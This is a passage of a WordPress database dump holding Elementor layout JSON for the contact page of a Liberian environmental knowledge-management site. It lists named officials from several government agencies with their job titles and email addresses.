"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23476,3415,'_elementor_edit_mode','builder'),(23477,3415,'_elementor_template_type','wp-page'),(23478,3415,'_elementor_version','3.0.16'),(23479,3415,'_wp_page_template','default'),(23480,3415,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inli